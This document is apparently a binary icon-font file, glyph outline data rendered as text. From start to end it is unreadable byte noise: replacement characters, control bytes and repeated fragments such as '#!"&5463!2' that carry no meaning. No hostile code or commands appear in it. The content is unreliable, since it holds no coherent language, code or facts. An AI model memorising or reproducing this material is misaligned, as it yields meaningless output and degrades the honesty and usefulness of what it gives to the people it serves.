"g`�81T`PSA:'�*��4�/D#!"&5463!2#"'&#!"3!26=4?632"'&4?62	62��w��w��w@?61

��B^^B@B^	@

��B�RnB�Bn^��w��w@w�1
^B��B^^B�
	@
���Bn���nB�C"&=!32"'&46;!"'&4762!#"&4762+!5462�4&���&�4�&���&4�4&��&4&��&4�4�&���&4�4&��&4&��&4�4&���&����6'&'+"&546;267��:	&�&&�&	s�@�	
�Z&&�&&�Z
	���+6'&''&'+"&546;267667��:	�:	&�&&�&	�	s�@�	
�:�	
�Z&&�&&�Z
	��:
	z����6'&''&47667S�:	�:�	s�@�	
�:�4��:
	�|�	&546h��!!0a�
�
�
$���#!"&5463!2#!"&5463!2&�&&&��&�&&&@��&&�&&��&&�&&���#!"&5463!2&��&&�&@��&&�&&���&54646&5-�	��:	s��:	
��:4�:�
	���+&5464646;2+"&5&5-�	�	&�&&�&	�:	s��:	
��:	
�&&��&&�
	�:�
	���&54646;2+"&5-�	&�&&�&	s��:	
�&&��&&�
	62#!"&!"&5463!2�4��@��&&�&&-��:��&&&�&�����	"'&4762����4��4����4��4��4Z��f�	"/&47	&4?62S�4����4����44��4���#/54&#!4&+"!"3!;265!26 $$ �&�&�&�&&&�&&@���^����a�a@�&&&�&�&�&&&+�^����a�a�����54&#!"3!26 $$ �&�&&&@���^����a�a@�&&�&&+�^����a�a�����+74/7654/&#"'&#"32?32?6 $$ }��Z��Z��Z��Z����^����a�a���Z��Z��Z��Z�^����a�a�����#4/&"'&"327> $$ [4�h�4[j����^����a�a"Z�i�Z��J�^����a�a�����:F%54&+";264.#"32767632;265467>$ $$ ���o�W��	5!"40K(0?i�+! ":����^����a�a����X�R�dD4!&.uC$=1/J=�^����a�a�����.:%54&+4&#!";#"3!2654&+";26 $$ `��``��������^����a�a�����������^����a�a�����/_#"&=46;.'+"&=32+546;2>++"&=.'#"&=46;>7546;232�m&&m �l&�&l� m&&m �l&�&l�s&�%�&�&��%�&&�%�&�&��%�&&�&l� m&&m �l&�&l� m&&m �,�&��%�&&�%�&�&��%�&&�%�&���#/;"/"/&4?'&4?627626.  6 $$ I�

��

�

��

�

��

�

��
͒������(�r���^����a�aɒ

��

�

��

�

��

�

��
(��������_�^����a�a����� ,	"'&4?6262.  6 $$ ��Z4��f4�4fz�������(�r���^����a�a�Z&4f�f4�(��������_�^����a�a�����	"4'32>&#" $&6$  W���oɒV�󇥔�� z�����zz�8�����YW�˼�[����?����zz�:�zz�@�5K #!#"'&547632!2A4�@%&&K%54'�u%%�&54&K&&���4A��5K��$l$L%%�%54'�&&J&j&��K�5�K #"/&47!"&=463!&4?632�%�u'43'K&&%�@4AA4���&&K&45&�%@6%�u%%K&j&%K5�5K&$l$K&&�u#5��K@!#"'+"&5"/&547632K%K&56$��K5�5K��$l$K&&�#76%�%53'K&&%�@4AA4���&&K&45&�%%�u'5��K�"#"'&54?63246;2632K%�u'45%�u&&J'45%&L4�4L&%54'K%�5%�t%%�$65&K%%���4LL4�@&%%K'���,"&5#"#"'.'547!3462�4&�b��qb>#5���&4�4�&6Uu�e7D#		"�dž�&����/#!"&546262"/"/&47'&463!2�
���&�@&&4�L

r&4���

r

L�&�&�
���4&&�&�L

rI�@&���

r

L�4&&
���s/"/"/&47'&463!2#!"&546262&4���

r

L�&�&�
���&�@&&4�L

r@�@&���

r

L�4&&�
���4&&�&�L

r��##!+"&5!"&=463!46;2!2�8(�`8(�(8�`(88(�8(�(8�(8 �(8�`(88(�8(�(8�(88(�`8��#!"&=463!2�8(�@(88(�(8 �(88(�(88z���5'%+"&5&/&67-.?>46;2%6�.@g.��L4�4L��.g@.
��.@g.
L4�4L
.g@.���g.n.���4LL43�.n.g��g.n.�34LL4�͙.n.g����-  $54&+";264'&+";26/�a����^�����
�

�


�

�����^����a�a��
�
fm��
@
J%55!;263'&#"$4&#"32+#!"&5#"&5463!"&46327632#!2���$�$�8�~+(88�8(+}�(�`8(��(8`�]��]k=��=k]��]��8���,8e�8P88P8�����`(88(�@���M��M����N4&#"327>76$32#"'.#"#"&'.54>54&'&54>7>7>32&����z&^��&.������/+>+)>J>	W��m7����'
'"''? &4&c��&^|h_b��ml/J@L@#*
#M6:D
35sҟw$	'%
'	\�t��3#!"&=463!2'.54>54''�
��

@
�1O``O1CZ��Z71O``O1BZ��Z7�@

@
N�]SHH[3`�)Tt��bN�]SHH[3^�)Tt���!1&' 547 $4&#"2654632 '&476 ���=������=嘅�����}�(zVl��'��'���ٌ@�uhy����yhu����9(�}Vz��D#���#D#�������	=CU%7.5474&#"2654632%#"'&547.'&476!27632#76$7&'7+NWb=嘧�}�(zV�j�\i1
z,��X��
Y[6
$!%���'F��u�J�iys�?_�9ɍ?�kyhu�n(�}Vz����YF
KA؉L�a
�0��2�-�F"@Q���sp@�_���!3%54&+";264'&+";26#!"&'&7>2
�

�


�
�
#%;"�";%#<F<������7


���??""??�$$ll2#"'&'	+&/&'&?632	&'&?67>`,@L�����5
`		��
`	�����L�`4�L��H`
����`	��
a	5�
��L@��#37;?Os!!!!%!!!!%!!!!!!!!%!!4&+";26!!%!!!!74&+";26%#!"&546;546;2!546;232� ��`@���� ��`@���� ���@����@�� ��@����
@

@
� ��@��� �� 
@

@
�L4��4LL4�^B@B^�^B@B^�4L� �� @@��@@ � � � @@  

��
��@@ �� � 

��
M�4LL44L`B^^B``B^^B`L���7q.+"&=46;2#"&=".'673!54632#"&=!"+"&=46;2>767>3!54632�<M33K,��	��	
 j8Z4L2B4:;M33K,?		��	
�0N<* .)C=W]xD��0N<* .)C=W]xD?\�-7H)��	��	
�".=']�-7H)�
��w	��	
�<?.>mBZxPV3!�<?.>mBZxPV3!�
���&#"'&'5&6&>7>7&54>$32�d�FK��1A
0)����L���.���٫�C58.H(Y���e����#3C $=463!22>=463!2#!"&5463!2#!"&5463!2���H���&�&/<R.*.R</&�&�&��&&�&&��&&�&������Bɀ&&�4L&&L4�&&f��&&�&&��&&�&&Z� %"'	"/&4762��4���4��4�ͥ���5��5Z����	"'&4?62	62��4��44���5����5��%K%#!".<=#"&54762+!2"'&546;!"/&5463!232
�@�&@<@&�@	����:��&���	�
��& 

��&���&���
����&��	

��`&���:$"&462"&462!2#!"&54>7#"&463!2!2�LhLLh�LhLLh�!��
�&&�&��&&�&4hLLhLLhLLhL��%z<
0&4&&)17&4&
&&��#!"&5463!2!2��\�@\��\@\��\���@\��\�\��\ �W�*#!"&547>3!2!"4&5463!2!2W��+�B��"5P+�B@"5����^�=���\@\� \�H#�t3G#�3G:�_H�t�\��\ �@��+32"'&46;#"&4762�&��&�4�&��&4�4&�&4�4&&4�@�"&=!"'&4762!5462�4&�&4�4&&4�4�&��&4&��&����
!!!3!!��������������������������0@67&#".'&'#"'#"'32>54'6#!"&5463!28ADAE=\W{��O[/5dI
kDt���pČe1?*�w�@w��w�w��	(M&
B{Wta28r=Ku?RZ^Gw��T	-�@w��w�w�����$2+37#546375&#"#3!"&5463�w��w���/Dz?s�����w��w��w�@w�S�88�	�����w�w����#'.>4&#"26546326"&462!5!&  !5!!=!!%#!"&5463!2�B^8(�Ԗ���������>��������@�|�K5�5KK55K�^B(8Ԗ�Ԗ�€>�������v����5KK55KK�H��G4&"&#"2654'32#".'#"'#"&54$327.54632@p�p)*Ppp�p)*P�b	'"+`�N*(�a���;2��̓c`." b
PTY9��ppP*)p�ppP*)�b ".`�(*N��ͣ�2�ͣ����`+"'	b
MRZB�����4&"24&"264&"26#"/+"&/&'#"'&547>7&/.=46?67&'&547>3267676;27632#"&'"'#"'&547&'&=4767&547>32626?2#"&'"'#"'&547&'&=4767&547>32626?2��Ԗ���LhLKjKLhLKjK��	�"8w
s%(�")v

�
>�
	�"8x
s"+�")v
�<�
��3zLLz3��
3>8L3)x3
��3zLLz3��
3>8L3)x3
�Ԗ�Ԗ�4LL45KK54LL45KK���
#)0C	wZl/
�
Y�	
N,&�
#)0C	vZl.
�
Y�L0"��qG^^Gq�q$ ]G)Fq�qG^^Gq�q$ ]G)Fq��%O#"'#"&'&4>7>7.546$ '&'&'# '32$7>54'�����VZ|�$2$
|��E~E<�|
$2$�|ZV���:�(t}�������X(	
&%(H�w�쉉��x�H(%&	(X�ZT\�MKG���<m$4&"24&#!4654&#+32;254'>4'654&'>7+"&'&#!"&5463!6767>763232&4&&4�N2��`@`%)7&,$)'  
%/0Ӄy�#5 +�1	&<��$]`�{t��5KK5$e:1&+'3T�F0�h��4&&4&�3M:�;b^v�+D2 5#$��I�IJ 2E=\$YJ!$MCeM��-+(K5�5K�K5y�*%A�u]c���>q4&"24&'>54'654&'654&+"+322654&5!267+#"'.'&'&'!"&5463!27>;2&4&&4�+ 5#bW���0/%
  ')$,&7)%`@``2N��h�0##�T3'"(0;e$��5KK5 t��ip��<&	1&4&&4&�#\=E2&%IURI��$#5 2D+�v^b;�:M2g�c]vDEA%!bSV2M�K5�5K(,,��MeCM$!I��@�#"&547&547%6@�?V��8������b%	I�)���94.""'."	67"'.54632>32�+C`\hxeH>Hexh\`C+�ED���4��
#L</��>�oP$$Po�>��Q|I.3MCCM3.I|Q����/����Z$_d�C�+I@$$@I+� (@%#!"&5463!2#!"3!:"&5!"&5463!462�
��w��w@

��B^^B 
���4&�@&&�&4 ` 
�w�w�
 
^B�@B^24��& &�& &�����%573#7.";2634&#"35#347>32#!"&5463!2���FtIG9;HI�x�I��<,tԩw�@w��w�w�z��4DD43EE�����ueB���&#1�s�@w��w�w�����.4&"26#!+"'!"&5463"&463!2#2��&�S3L�l&�c4LL4�4LL4c����@��&��&{�LhLLhL��'?#!"&5463!2#!"3!26546;2"/"/&47'&463!2��w��w��w��@B^^B@B^@�&4��t

r

��&&`��w��w@w�@^B��B^^B@R�&��t

r

��4&&@"&5!"&5463!462	#!"&54&>3!2654&#!*.54&>3!2���4&�@&&�&4 s�w��

@B^^B��

@w��4��& &�& &��3�@w�
 
^B�B^ 
�����
I&5!%5!>732#!"&=4632654&'&'.=463!5463!2!2�J���J���S��q*5&=CKu��uKC=&5*q͍S8( ^B@B^ (8���`N��`Ѣ�΀G�tO6)"M36J[E@@E[J63M")6Ot�G�(8`B^^B`8	���',2��6'&'&76'6'&6&'&6'&4#"7&64 654'.'&'.63226767.547&7662>76#!"&5463!2		/[		.
=���X��Ě4,+"*+, 1JH'5G:�:#L5+@=&#���w�@w��w�w�P.1GE�,��ԧ��44+	;/5cFO:>JJ>:O9W5$@(b4��@w��w�w������'?$4&"2$4&"2#!"&5463!3!267!2#!#!"&5!"'&762&4&&4&&4&&4�8(�@(88(�c==c�(8��*�&�&�*�6�&4&&4&&4&&4& ��(88(@(88HH88`(�@&&�('��@����1c4&'.54654'&#"#"&#"32632327>7#"&#"#"&54654&54>76763232632


	N<�;+gC8�A`1a9�9�g��w����|�9�8aIe$I�VN��z<�:LQJ
�,�-[%	061I��(�)W,$-������7,oIX(�)o�ζA;=N0
eTZ
	 (���O#".'&'&'&'.54767>3232>32�e^\4?P	bM��O0#382W#& 9C9
Lĉ"	82<*9FF(W283#0OMb	P?4\^eFF9*<28	"��L
9C9 &#��!"3!2654&#!"&5463!2`��B^^B@B^^ީw��w��w@w�^B��B^^B@B^���w��w@w�����#!72#"'	#"'.546763���YY�!''!0#�G�G$/!''!�&�UU�jZ	
8"��"8
 ��X!	
8"	"8
	���GW4.'.#"#".'.'.54>54.'.#"32676#!"&5463!2 1.-
+$)
c�8
)1)

05.D
<9�0)$9��w�@w��w�w�W

)1)
7�c
)$+
-.1 �9$)0���<
D.59�@w��w�w��,T1# '327.'327.=.547&54632676TC_L��Ҭ���#+�i�!+*p�DNBN,y[����`m`%i]hbE����m��}a�u&,�SXK��
&$��f9s?
_���#"!#!#!54632��V<%'����Э��HH���	�(ں����T\dksz�� &54654'>54'6'&&"."&'./"?'&546'&6'&6'&6'&6'&74"727&6/�a���49[aA)O%-j'&]�]5r-%O)@a[9'
0BA;+


>HC���U


	#	
	
$				2	
AC: �����oM�=a-6O�UwW[q	( -	q[WwU�P6$C

+) (	
8&/
&eM���a�	
&
$	

��%+"&54&"32#!"&5463!54 �&@&�Ԗ`(88(�@(88(�r��&&j��j�8(��(88(@(8��������#'+2#!"&5463"!54&#265!375!35!�B^^B��B^^B
�

��
`���^B�@B^^B�B^�
��
�
`��
�������!="&462+"&'&'.=476;+"&'&$'.=476;�p�pp�p�$���!�$qr�
�%���}�#ߺ���pp�p��!�E$�
�rq�ܢ#���
%�
ֻ��!)?"&462"&4624&#!"3!26!.#!"#!"&547>3!2/B//B//B//B�
�@

�
�2�����^B�@B^�\77\�aB//B//B//B/�@

��
��

�~��B^^B@2^5BB5��2���.42##%&'.67#"&=463! 2�5KK5L4�_�u:B&1/&��.-
zB^^B���4L��v��y�KjK��4L[!^k'!A3;):2*�<vTq6^B�B^�L4�$���)��*@��A4#"&54"3!4."#!"&5!"&5>547&5462�;U gI�v��0Z���Z0�L4�@�Ԗ�@4L2RX='�8P8��'=XR� U;Ig0,3lb??bl3���4Lj��jL4*\���(88(�����\���}I/#"/'&/'&?'&'&?'&76?'&7676767676`�
(�5)�0
)��*)
0�)5�(
��
(�5)�0
))��))
0�)5�(
��*)
0�)5�(��
)�5)�0
)*��*)
0�)5�)
��
)�5)�0
)*���5h$4&"24&#!4>54&#"+323254'>4'654&'!267+#"'&#!"&5463!2>767>32!2&4&&4�N2��$YGB
(HGEG  H��Q�#5K4L��i�!<�����;��5KK5 
A#
("/?&}�vh��4&&4&�3M95S+C=�,@QQ9��@@�IJ 2E=L5i�>9eM��E;K5�5K	J7R>@#�zD<����5=q%3#".'&'&'&'.#"!"3!32>$4&"2#!"#"&?&547&'#"&5463!&546323!2`  #A<(H(GY$��2NL4K5#aWTƾh&4&&4�K5��;����=!�i��hv�}&?/"(
#A
 5K��2*!	Q@.'!&=C+S59M34L=E2 JI UR@@&4&&4&���5K;E��Lf9>�ig�<Dz�#@>R7J	K�5h4&"24#"."&#"4&#"".#"!54>7#!"&54.'&'.5463246326326&4&&4��IJ 2E=L43M95S+C=�,@QQ9�@@�E;K5��5K	J7R>@#�zD<�gi�>9eM��Z4&&4&<�#5K4LN2��$YGB
(HGEG  H��V���;��5KK5 
A#
("/?&}�vh��i�!<��4<p4.=!32>332653272673264&"2/#"'#"&5#"&54>767>5463!2�@@��2*!	Q@.'!&=C+S59M34L.9E2 JI UR�&4&&4&��Lf6A�ig�6Jy�#@>R7J	K5�5K;E@TƾH  #A<(H(GY$��2NL4K#5#a=4&&4&�D��=�i��hv�}&?/"(
#A
 5KK5��;�����+54&#!764/&"2?64/!26 $$ &�
�[6��[[j6[��&���^����a�a@�&�4[��[6[��[6�&+�^����a�a�����+4/&"!"3!277$ $$ [��6[��
&&��[6j[
���^����a�ae6[j[6�&�&�4[j[��^����a�a�����+4''&"2?;2652?$ $$ ��[6[��[6�&�&�4[���^����a�af6j[[��6[��
&&��[��^����a�a�����+4/&"4&+"'&"2? $$ [6�&�&�4[j[6[j���^����a�ad6[��&&�
�[6��[[j��^����a�a������  $2>767676&67>?&'4&'.'.'."#&6'&6&'3.'.&'&'&&'&6'&>567>#7>7636''&'&&'.'"6&'6'..'/"&'&76.'7>767&.'"76.7"7"#76'&'.'2#22676767765'4.6326&'.'&'"'>7>&&'.54>'>7>67&'&#674&7767>&/45'.67>76'27".#6'>776'>7647>?6#76'6&'676'&67.'&'6.'.#&'.&6'&.5/�a����^����D&"	


	4
	$!	#
	
		
	



 
.0"�Y
	+


!	
	

$	
	"
+


		
	�Α	
		
����^����a�a��

	

			
	

	

		
	
		P� '-(	#	*	$

"
!				
*
!	

(				

	
��$�
		
2
�~�/$4&"2	#"/&547#"32>32�&4&&4��V%54'j&&�'��/덹���:,���{	&4&&4&�V%%l$65&�b��'C��r!"��k[G�+;%!5!!5!!5!#!"&5463!2#!"&5463!2#!"&5463!2����������&��&&�&&��&&�&&��&&�&�������@�&&&&�&&&&�&&&&��{#"'&5&763!2{�'
��**�)��*��)'/!5!#!"&5!3!26=#!5!463!5463!2!2���^B�@B^�&@&`��^B`8(@(8`B^��� B^^B�&&�����B^�(88(�^���G	76#!"'&?	#!"&5476	#"'&5463!2	'&763!2#"'��c�)'&�@*������*�@&('�c���(&�*�cc�*�&'
����*�@&('�c���'(&�*�cc�*�&('���c�'(&�@*��19AS[#"&532327#!"&54>322>32"&462 &6 +&'654'32>32"&462Q�g�Rp|Kx;CB��y��y� 6Fe=
BP���PB
=eF6 ��Ԗ��V����>!pR�g�QBC;xK|��Ԗ���{QNa*+%��x��x5eud_C(+5++5+(C_due2Ԗ�Ԗ�����>�NQ{u�%+*jԖ�Ԗ��p�!Ci4/&#"#".'32?64/&#"327.546326#"/&547'#"/&4?632632��(* 8(!�)(��A�('��)* 8(!U�SxyS�SXXVzxT�TU�SxyS�SXXVzxT�@(� (8 *(���(��'(�(8 ���S�SU�Sx{VXXT�T�S�SU�Sx{VXXT���#!"5467&5432632�������t,Ԟ;F`j�)��������6�,��>�jK?�s��
�!%#!"&7#"&463!2+!'5#�8Ej��jE8�@&&&&@������XYY�&4&&4&�qD�S�%��q%��N\jx��2"&4#"'#"'&7>76326?'&'#"'.'&676326326&'&#"32>'&#"3254?''7�4&&4&l��
�NnbS���VZbR��SD	
zz
	DS��Rb)+U���Sbn�
��\.2Q\dJ'.2Q\dJ.Q2.'Jd\Q2.'Jd`!O�`��	`�����&4&&4�r$#@�B10M�5TNT{L�5T
	II	
T5�L;l'OT4�M01B�@#$�*�3;$*�3;�;3�*$;3�*$�:$/� @@�Qq`��@���"%3<2#!"&5!"&5467>3!263!	!!#!!46!#!�(88(�@(8��(8(�`(�(8D<���+����+�<��8(�`(��8(�`�8(�@(88( 8(�(`�(8(��(������<��`(8��(`����`(8����||?%#"'&54632#"'&#"32654'&#"#"'&54632|�u�d��qܟ�s]
=
��Ofj�L?R@T?��"&�
>
�f?rRX=Ed�u�ds���q��
=
_M�jiL��?T@R?E& �f
>
�=XRr?��b���!1E)!34&'.##!"&5#3463!24&+";26#!"&5463!2����
��
08(��(8��8(@(8��
�

�
�8(��(88(�(`(����1

�`(88(���(88(@

��
�`(88(@(8(��`���#!"&5463!2�w�@w��w�w�`�@w��w�w��/%#!"&=463!2#!"&=463!2#!"&=463!2&��&&�&&��&&�&&��&&�&��&&�&&�&&�&&�&&�&&��@'7G$"&462"&462#!"&=463!2"&462#!"&=463!2#!"&=463!2�p�pp�pp�pp��
�@

�
��p�pp��
�@

�

�@

�
Рpp�p��pp�p���

�
�pp�p���

�
�

�
��<L\l|#"'732654'>75"##5!!&54>54&#"'>3235#!"&=463!2!5346=#'73#!"&=463!2#!"&=463!2}mQjB919+i1$AjM_3<��/BB/.#U_:IdDRE�
�@
�
����k*G�j�
�@
�

�@

�
TP\BX-@8
C)5�XsJ@�$3T4+,:;39SG2S.7<���

�vcc)�)%L�l�}�

��

�
���5e2#!"&=463%&'&5476!2/&'&#"!#"/&'&=4'&?5732767654'&��@�0��2uBo
T25XzrDCBB�Eh:%��)0%HPIP{rQ�9f#-+>;I@KM-/Q"�@@@#-bZ��$&P{<�8[;:XICC>.�'5oe80#.0(
l0&%,"J&9%$<=DTI���cs&/6323276727#"327676767654./&'&'737#"'&'&'&54'&54&#!"3!260%
<4�"VRt8<@<
-#=XYhW8+0$"+dT�Lx-'I&JKkm��uw<=V�@�!X@		v
'��|N;!/!$8:I�Ob�V;C#V

&
(���mL.A:9 !./KLwP�M�$��@@
��/?O_o��%54&#!"3!2654&#!"3!2654&#!"3!2654&#!"3!2654&#!"3!2654&#!"3!2654&#!"3!2654&#!"3!2654&#!"3!26#!"&5463!2��@��@��@���@��@��@���@��@��@�^B��B^^B@B^�����������������������������N��B^^B@B^^���#+3	'$"/&4762%/?/?/?/?�%k��*��6�6��bbbb|��<<��<�bbbb��bbbb�%k���6���6Ƒbbb��<<��<<�^bbbbbb@��M$4&"2!#"4&"2&#"&5!"&5#".54634&>?>;5463!2�LhLLh����
	�	LhLLhL!'�Ԗ���Ԗ@'!&	
�?�&&LhLLhL�	�	
��hLLhL��	j��jj��j	&@6/"
��&&���J#"'676732>54.#"7>76'&54632#"&7>54&#"&54$ ���ok;	-j=y�hw�i�[+PM3ѩ���k=J%62>Vc��a�aQ�^��� ]G"�'9��r�~:`}�Ch�  0=Z�٤���W=#uY2BrUI1�^Fk[|��a�����L2#!67673254.#"67676'&54632#"&7>54&#"#"&5463�w��w�+U	,i<��F{�jh�}Z+OM

2ϧ���j<J%51=Ub�w��w��w�@w�zX"�'8'�T�yI9`{�Bf� 
,>X�բ���W<"uW1AqSH1�bd��w�w����'74'!3#"&46327&#"326%35#5##33#!"&5463!2����0U6c��c\=hl���ࠥ�Ymmnnnn�w�@w��w�w�w&�46#�Ȏ;ed����wnnnnn��@w��w�w����	]#/#"$&6$3 &#"32>7!5!%##5#5353����Е���tt����u�{�zz�{S�ZC�`�c�����o���t�*�t��q|��|.EXN#�??�������,<!5##673#$".4>2"&5!#2!46#!"&5463!2��r�M*
�*M~�~M**M~�~M*j����jj����&�&&&�`��P%��挐|NN|���|NN|�*�jj���jj�@��&&�&&@�
"'&463!2�@4�@&�Z4�@�4&@
#!"&4762&��&�4�Z4&&4��@@���
"'&4762�&4�@�4&@��&�4�&�@�
"&5462@�@4&&4��4�@&�&�@����
3!!%!!26#!"&5463!2�`��m��`
�^B��B^^B@B^���
 `���@B^^B�B^^��@
"'&463!2#!"&4762�@4�@&�&&��&�4��4�@�4&Z4&&4��@��
"'&463!2�@4�@&��4�@�4&@
#!"&4762&��&�4�Z4&&4��@��:#!"&5;2>76%6+".'&$'.5463!2^B�@B^,9j�9Gv33vG9�H9+bI��\
A+=66=+A
[��">nSM�A_:��B^^B1&�c*/11/*{�'VO�3��@/$$/@�*�?Nh^��l+!+"&5462!4&#"!/!#>32]��_gTRdg�d���QV?U��I*Gg?����!�2IbbIJaa���iwE33����00� 08����4#"$'&6?6332>4.#"#!"&54766$32z�䜬��m�
I�wh��QQ��hb�F�*�@&('�k�������z��
�	
_hQ��н�QGB�'(&�*�eoz�(���q!#"'&547"'#"'&54>7632&4762.547>32#".'632�%k'45%��&+�~(
(�h		&

\(
(�		&

~+54'k%5%l%%l$65+~

&		�(
(\

&		�h(
(~�+%��'��!)19K4&"24&"26.676&$4&"24&"24&"2#!"'&46$ �KjKKjKjKKj�e2.e<^P��,bKjKKj��KjKKjKjKKj��#��#���LlL�KjKKjKjKKjK��~-��M<M�(PM<rjKKjK�jKKjKujKKjK�������L���< 6?32$6&#"'#"&'5&6&>7>7&54$ L�h��я�W.�{+9E=�c��Q�d�FK��1A
0)���������p�J2`[Q?l&������٫�C58.H(Y��'����:d 6?32$64&$ #"'#"&'&4>7>7.546'&'&'# '32$7>54'Y����j`a#",5NK�
����~E�����VZ|�$2$
|��:
$2$�|ZV���:�(t}�����h�fR�88T
h�̲����X(	
&%(H�w��(%&	(X�ZT\�MKG�{x��|�!#"'.7#"'&7>3!2%632u��

�j
�H����{(e9
�1b���U#!"&546;5!32#!"&546;5!32#!"&546;5463!5#"&5463!2+!2328(��(88(`�`(88(��(88(`�`(88(��(88(`L4`(88(@(88(`4L`(8 ��(88(@(8��8(��(88(@(8��8(��(88(@(8�4L�8(@(88(��(8�L4�8����OY"&546226562#"'.#"#"'.'."#"'.'.#"#"&5476$32&"5462��И&4&NdN!>!
1X:Dx++w�w++xD:X1
-�U��
�!�*,*&4&��h��h&&2NN2D&

..J<
$$
<JJ<
$$
<J..

��P���bb&&�7!!"&5!54&#!"3!26!	#!"&=!"&5463!2��`(8��
�@

�
+��8(�@(8��(88(@(8�(��8(� @

@
�m+�U�`(88(�8(@(88(��
�h`���(\"&54&#"&46324."367>767#"&'"&547&547&547.'&54>2�l4

2cK�Eo���oED
)
�
�
�
)
D�g-;</-
?.P^P.?
-/<;-gY�����Y�

.2 L4H|O--O|HeO,����,Oe�q1Ls26%%4.2,44,2.4%%62sL1q�c�qAAq����4#!#"'&547632!2#"&=!"&=463!54632
��
��		@	
`
	��	
��

`?`�
�

@	
	@	
�!	��	
�
�
�
����54&+4&+"#"276#!"5467&5432632�
�
�
	`		_
�������v,Ԝ;G_j�)��``

��
	��		_ԟ����7
�,��>�jL>���54'&";;265326#!"5467&5432632	��		��
�
�
�
�������v,Ԝ;G_j�)���	`		����

`������7
�,��>�jL>�����X`$"&462#!"&54>72654&'547 7"2654'54622654'54&'46.' &6 �&4&&4&�y��y�%:hD:Fp�pG9�F�j� 8P8 LhL 8P8 E;
Dh:%������>�4&&4&}y��yD~�s[4D�d=PppP=d�>hh>@�jY*(88(*Y4LL4Y*(88(*YDw"
A4*[s�~����>�����M4&"27 $=.54632>32#"' 65#"&4632632 65.5462&4&&4�G9��������&
<#5KK5!��!5KK5#<
&ܤ��9Gp�p&4&&4&@>b�u��ោؐ&$KjK�nj��j�KjK$&����j��j�b>Ppp���
%!5!#"&5463!!35463!2+32����@\��\���8(@(8�\@@\������\@\���(88(��\��@��34#"&54"3#!"&5!"&5>547&5462�;U gI@L4�@�Ԗ�@4L2RX='�8P8��'=XR� U;Ig04Lj��jL4*\���(88(�����\��@"4&+32!#!"&+#!"&5463!2�pP@@P���j�j�@�@�\�@\�&��0�p����j��	��� \��\�&��-B+"&5.5462265462265462+"&5#"&5463!2�G9L4�4L9G&4&&4&&4&&4&&4&L4�4L�
��&���=d��4LL4d=�&&�`&&�&&�`&&�&&��4LL4
 ��&�#3CS#!"&5463!2!&'&!"&5!463!2#!"&52#!"&=4632#!"&=463�(8(��(88(�(`�x
��c�`(8���@��@��@�`(��(88(@(8(D��9�8(��`@�@@�@@��/?O_o��������-=%+"&=46;25+"&=46;2+"&=46;2%+"&=46;2+"&=46;2%+"&=46;2%+"&=46;2%+"&=46;2+"&=46;2%+"&=46;2%+"&=46;2%+"&=46;2+"&=46;2%+"&=46;2%+"&=46;2+"&=46;2%+"&=46;2+"&=46;2!!!5463!2#!"&5463!2�
@

@

@

@

@

@
�
@

@

@

@
�
@

@
�
@

@
�
@

@

@

@
�
@

@
�
@

@
�
@

@

@

@
�
@

@
�
@

@

@

@
�
@

@

@

@
�����
@
&�&&&�@

@
�@

@

@

@
�@

@
��@

@
�@

@
�@

@
�@

@
��@

@
�@

@
�@

@
�@

@
��@

@
�@

@
�@

@
��@

@
�@

@

@

@
����

`��&&�&&
��/?O_o�����%+"&=46;25+"&=46;2+"&=46;2%+"&=46;2+"&=46;2%+"&=46;2%+"&=46;2+"&=46;2%+"&=46;2+"&=46;2!!#!"&=!!5463!24&+"#54&+";26=3;26%#!"&5463!463!2!2�
@

@

@

@

@

@
�
@

@

@

@
�
@

@
�
@

@

@

@
�
@

@

@

@
���8(�@(8��
@

@
�
@

@
�
@
&�&&@8(�(8@&�@

@
�@

@

@

@
�@

@
��@

@
�@

@
�@

@
��@

@
�@

@

@

@
��� (88( ���

�@

``

��

``
-�&&& (88(��&@����<c$4&"2!#4&"254&+54&+"#";;26=326+"&5!"&5#"&46346?>;463!2�KjKKj�����KjKKj�������&��Ԗ���Ԗ�&&�@�&�&KjKKjK��
��jKKjK ������.��&j��jj��j&4&�@�@&&���#'1?I54&+54&+"#";;26=326!5!#"&5463!!35463!2+32����������� \��\����8(@(8�\  \����������\@\���(88(��\����:
#32+53##'53535'575#5#5733#5;2+3����@��E&&`�@@��`  ����  `��@@�`&&E%@�`��@ @ @��		 �� � � � �� 		��@ 0
@��!3!57#"&5'7!7!��K5�������@ � � @���5K�@����@@��� �����#3%4&+"!4&+";265!;26#!"&5463!2&�&�&�&&�&&�&�w�@w��w�w���&&��@&&��&&@��&&��@w��w�w�����#354&#!4&+"!"3!;265!26#!"&5463!2&��&�&��&&@&�&@&�w�@w��w�w�@�&@&&��&�&��&&@&:�@w��w�w��-M�3)$"'&4762	"'&4762	s
2

�.

�

2

�w��
2

�.

�

2

�w��
2

�

�

2

�w�w

2

�

�

2

�w�w
M�3)"/&47	&4?62"/&47	&4?62S
�.

2

��w

2

��
�.

2

��w

2

�M
�.

2

��

2

�.

�.

2

��

2

�.M�3S)$"'	"/&4762"'	"/&47623
2

�w�w

2

�

�

2

�w�w

2

�

��
2

��w

2

�

�.v
2

��w

2

�

�.M�3s)"'&4?62	62"'&4?62	623
�.

�.

2

��

2

�.

�.

2

��

2�
�.

�

2

�w�

2v
�.

�

2

�w�

2-Ms3	"'&4762s
�w�

2

�.

�

2�
�w�w

2

�

�

2
MS3"/&47	&4?62S
�.

2

��w

2

�M
�.

2

��

2

�.M
3S"'	"/&47623
2

�w�w

2

�

�m
2

��w

2

�

�.M-3s"'&4?62	623
�.

�.

2

��

2-
�.

�

2

�w�

2���/4&#!"3!26#!#!"&54>5!"&5463!2
��

@
�^B��  &�&  ��B^^B@B^ @

��
M��B^%Q=
&&<P&^B@B^^�+3"&5463!2#3!2654&#!"3#!"&=324+"3�B^^B@B^^B��
@

��
`�^B��B^�p�^B�B^^B�@B^`�@

�
�S`(88(``  ��'$4&"2%4&#!"3!26#!"&5463!2�&4&&4�
��

@
�^B��B^^B@B^f4&&4&��

�@
��B^^B@B^^/$4&"2%4&#!"3!264+";%#!"&5463!2�/B//B�
�


���0L4�4LL44L_B//B/��

�@
